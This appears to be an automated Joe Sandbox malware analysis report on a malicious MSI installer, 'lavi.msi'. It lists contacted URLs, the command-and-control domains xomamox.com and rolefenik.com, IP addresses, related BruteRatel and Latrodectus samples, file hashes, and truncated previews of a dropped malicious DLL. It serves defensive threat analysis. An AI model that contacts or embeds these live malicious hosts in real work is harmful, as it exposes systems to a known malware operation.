https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xomamox.com:8877/gump.phpx | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://rolefenik.com/ | explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.microsoft.c | explorer.exe, 0000000B.00000000.2290826677.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009237000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/xtMenuArray_198721XV | explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09 | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSd | explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/ser-l1-1-0 | explorer.exe, 0000000B.00000002.3906622826.000000000C061000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/v | explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xomamox.com:8877/gump.php | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://r11.o.lencr.org0# | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://xomamox.com:8877/forest.phpl | rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://ns.adobeS | explorer.exe, 0000000B.00000002.3895491206.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289118490.0000000004405000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://outlook.com | explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://r11.i.lencr.org/0 | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285729240.000001A9928B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476379460.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3476449786.000001A9928B6000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/0 | explorer.exe, 0000000B.00000002.3906622826.000000000C08D000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.thawte.com/cps0/ | lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | false | | high
https://rolefenik.com/= | explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://word.office.com48 | explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.thawte.com/repository0W | lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | false | | high
https://xomamox.com:8877/re | rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://xomamox.com:8877/forest.php | rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp | explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.advancedinstaller.com | lavi.msi, MSI2586.tmp.2.dr, MSI25D6.tmp.2.dr, 5d243d.msi.2.dr, MSI2527.tmp.2.dr, MSI2635.tmp.2.dr, MSI2701.tmp.2.dr, MSI25B6.tmp.2.dr | false | | high
https://xomamox.com:8877/ | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://rolefenik.com/F | explorer.exe, 0000000B.00000002.3908559264.000000000C17B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/ | explorer.exe, 0000000B.00000002.3896365823.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289872722.0000000007046000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2866104583.000000000704B000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xomamox.com/ | rundll32.exe, 00000006.00000003.2285809473.000001A992830000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992827000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://xomamox.com:8877/gump.php- | rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/: | explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com:443/en-us/feed | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xomamox.com:8877/T | rundll32.exe, 00000006.00000003.2285809473.000001A992861000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
80.66.76.106 | xomamox.com | Russian Federation | 202723 | VAD-SRL-AS1MD | false
172.67.191.232 | rolefenik.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1555052
Start date and time:2024-11-13 10:58:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 7s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Sample name:lavi.msi
Detection:MAL
Classification:mal100.troj.evad.winMSI@9/24@3/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 85%
• Number of executed functions: 46
• Number of non-executed functions: 191
Cookbook Comments:
• Found application associated with file extension: .msi
• Override analysis time to 240s for rundll32
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: lavi.msi
Time | Type | Description
05:01:01 | API Interceptor | 10198989x Sleep call for process: explorer.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
80.66.76.106 | Document-v09-42-38.js | malicious | BruteRatel
80.66.76.106 | apptext.dll.dll | malicious | BruteRatel, Latrodectus
80.66.76.106 | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus
80.66.76.106 | yPSjWvD9LD.dll | malicious | BruteRatel, Latrodectus
80.66.76.106 | 0TokOhBLe6.dll | malicious | BruteRatel, Latrodectus
172.67.191.232 | 0TokOhBLe6.dll | malicious | BruteRatel, Latrodectus
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rolefenik.com | apptext.dll.dll | malicious | BruteRatel, Latrodectus | 104.21.92.105
rolefenik.com | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus | 104.21.92.105
rolefenik.com | yPSjWvD9LD.dll | malicious | BruteRatel, Latrodectus | 104.21.92.105
rolefenik.com | 0TokOhBLe6.dll | malicious | BruteRatel, Latrodectus | 172.67.191.232
xomamox.com | Document-v09-42-38.js | malicious | BruteRatel | 80.66.76.106
xomamox.com | apptext.dll.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
xomamox.com | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus | 80.66.76.106
xomamox.com | yPSjWvD9LD.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
xomamox.com | 0TokOhBLe6.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Document-v09-42-38.js | malicious | BruteRatel | 188.114.96.3
CLOUDFLARENETUS | doc_Capelleaandenijssel_102531613710.html | malicious | Phisher | 188.114.96.3
CLOUDFLARENETUS | https://wmrc.titurimplec.com/HA02SW/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://shorturl.at/gHbMJ | malicious | Unknown | 172.67.69.88
CLOUDFLARENETUS | REQ 2024 xlx.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3
CLOUDFLARENETUS | CN-Statement of Accounts and ETax-OB-XXXXX6856-0301282420180880.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | #U0130#U015eLEM B#U0130LG#U0130LER#U0130.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | RFQ for WIKA_pdf.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | Sip. fiyat teklif dermok-8128-20241112.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
CLOUDFLARENETUS | AYoF5MX6wK.exe | malicious | STRRAT | 104.20.3.235
VAD-SRL-AS1MD | Document-v09-42-38.js | malicious | BruteRatel | 80.66.76.106
VAD-SRL-AS1MD | apptext.dll.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
VAD-SRL-AS1MD | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus | 80.66.76.106
VAD-SRL-AS1MD | yPSjWvD9LD.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
VAD-SRL-AS1MD | 0TokOhBLe6.dll | malicious | BruteRatel, Latrodectus | 80.66.76.106
VAD-SRL-AS1MD | SecuriteInfo.com.Win64.Evo-gen.31489.1077.exe | malicious | Xmrig | 80.66.64.85
VAD-SRL-AS1MD | gretdence.exe | malicious | Stealc, Vidar | 80.66.64.99
VAD-SRL-AS1MD | VBwitzAgrx.exe | malicious | Stealc, Vidar | 80.66.64.99
VAD-SRL-AS1MD | LisectAVT_2403002B_224.exe | malicious | Unknown | 80.66.76.30
VAD-SRL-AS1MD | LisectAVT_2403002B_224.exe | malicious | Unknown | 80.66.76.30
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Loader.exe | malicious | LummaC | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | Updatev4_5.exe | malicious | LummaC | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | apptext.dll.dll | malicious | BruteRatel, Latrodectus | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | CVMrdORGbI.exe | malicious | LummaC | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 172.67.191.232
a0e9f5d64349fb13191bc781f81f42e1 | Yeni sipari#U015f _TR-59647-WJO-001.vbs | malicious | Snake Keylogger, VIP Keylogger | 172.67.191.232
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\apptext.dll | Document-v09-42-38.js | malicious | BruteRatel
C:\Users\user\AppData\Roaming\apptext.dll | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus
C:\Windows\Installer\MSI2527.tmp | Document-v09-42-38.js | malicious | BruteRatel
C:\Windows\Installer\MSI2527.tmp | Document-v05-53-20.js | malicious | BruteRatel, Latrodectus
C:\Windows\Installer\MSI2527.tmp | FW3x3p4eZ5.msi | malicious | Bazar Loader, BruteRatel
C:\Windows\Installer\MSI2527.tmp | Document-19-06-38.js | malicious | BruteRatel
C:\Windows\Installer\MSI2527.tmp | Document-19-06-38.js | malicious | BruteRatel
C:\Windows\Installer\MSI2527.tmp | Document-14-33-26.js | malicious | Unknown
C:\Windows\Installer\MSI2527.tmp | net.msi | malicious | Unknown
C:\Windows\Installer\MSI2527.tmp | Document-14-33-26.js | malicious | Unknown
C:\Windows\Installer\MSI2527.tmp | 1156#U91d1#U5c71#U6bd2#U9738#U79bb#U7ebf#U5b89#U88c5#U5305.msi | malicious | Unknown
C:\Windows\Installer\MSI2527.tmp | Document-19-36-27.js | malicious | Unknown
Process:C:\Windows\System32\msiexec.exe
File Type:data
Category:modified
Size (bytes):1193
Entropy (8bit):5.653338257280714
Encrypted:false
SSDEEP:24:DlOgVrOpHM6aW9N7RpU4OgFPFDhiSkdGoLK:MGMTV3b1pPFD8SkdGn
MD5:DE2294900053B69E159747A02CEC9126
SHA1:D84B7BD9821927B11AFFD1C5F7E1A4D48FD4EA4C
SHA-256:36C94BF3B7AA289ADFC39BACC7DE2D0CF29B9408F3B7C8A93D169FF26B5D07A2
SHA-512:C0503BC15AA261A42AABA359349649F9506822C61AFF0CE5BBAB51271ECB1A2C1042F1503E9CBFFDB67758FC0AE35E046F10A1B9061085012793D63CA0309F33
Malicious:false
Reputation:low
                                                                                                                                                          Preview:...@IXOS.@.....@i'mY.@.....@.....@.....@.....@.....@......&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}..HtmControl..lavi.msi.@.....@a....@.....@........&.{288EF131-2483-44D2-A86F-48308EA76F57}.....@.....@.....@.....@.......@.....@.....@.......@......HtmControl......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{B48CC27C-9823-4256-8235-834BFD2D0DBB}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@......&.{4A323D5F-6D73-4C26-8E39-BE8928DA13EB}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@......&.{EFB833C5-471A-4841-A27D-3C9DBD3209A2}&.{BEA6F49C-A398-4148-AFB8-A4A1F2844AFA}.@........CreateFolders..Creating folders..Folder: [1]#.6.C:\Users\user\AppData\Roaming\COSACA LTD\HtmControl\.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6].. .C:\Users\user\AppData\Roaming\....+.C:\Users\user\AppData\Roaming\apptext.dll....WriteRegistryValues..Writing system registry values..Key: [1]
Process:C:\Windows\System32\msiexec.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1692160
Entropy (8bit):6.81012301516061
Encrypted:false
SSDEEP:24576:M7u7nB/DBD9accSqVO9y/QaDC4F3Zuk5UDJjbDE2W4VO8I/nYY:My/DBD9MVO9yosHF395UlbDBw82nB
MD5:86B57C9DEAFED093D4B47B03823B4D14
SHA1:47947DA463DD6F4ECF61AE960235A35144E903A8
SHA-256:F8E3EEF1FDA5969A7AABCC8FB5CC9F5FE245BBF6CC8E480459977B8E91EAB9BD
SHA-512:5F855ED0A3ECF561C45608D7F4579D6E4B1F1953863E97E0B5FEA1F33B38D0E03FEF16207D88864D2D936A4E65B677CD259EC248DBF06447B50F9E0488ACEAD3
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Document-v09-42-38.js, Detection: malicious
• Filename: Document-v05-53-20.js, Detection: malicious
Reputation:low
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3..5w..fw..fw..f<..g...fgw.gg..fgw.g}..f<..gp..f<..go..f<..gb..fw..f9..fgw.g...fw..fQ..f?v.g$..f?v.gv..f?v.fv..fw.qfu..f?v.gv..fRichw..f................PE..d.....g..........# ...).............`.......................................@............ A........................................`a..p....a...........^......0.......pS... ......P...p.......................(.......@............................................text...|........................... ..`.rdata...x.......z..................@..@.data...........L...h..............@....pdata..0...........................@..@.rsrc....^.......`...Z..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {288EF131-2483-44D2-A86F-48308EA76F57}, Number of Words: 10, Subject: HtmControl, Author: COSACA LTD, Name of Creating Application: HtmControl, Template: ;1033, Comments: This installer database contains the logic and data required to install HtmControl., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2131456
                                                                                                                                                          Entropy (8bit):7.438024782173503
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:/c53YhW8zBQSc0ZnSKBZKumZr7Aej3YOXT7wYyr8lCV:QYY0Zn3K/Ai33XXZ0
                                                                                                                                                          MD5:C65899E2519F4AD21FB4B97F0A113362
                                                                                                                                                          SHA1:A1F854C29A69C19949499FCA5E24B02B97BE46FD
                                                                                                                                                          SHA-256:025ABBEC1724B9180B369FE116DA9D90AE47A4996F6A4E28E8A947BAC1E0C741
                                                                                                                                                          SHA-512:ECA93CB24187735EC54D4B4E99675F87F1957E255F59C5432498BBC2C47C77B6CCFDF48861A2F78EB377307CE8F6E6458EAF4B766B96E6C2FAEA1FB87E3DCBB4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>...................!...................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F...G...H...I...J...K...L...M...N...............................................................................................................................................................................................................................................................................................................................<...........!...3............................................................................................... 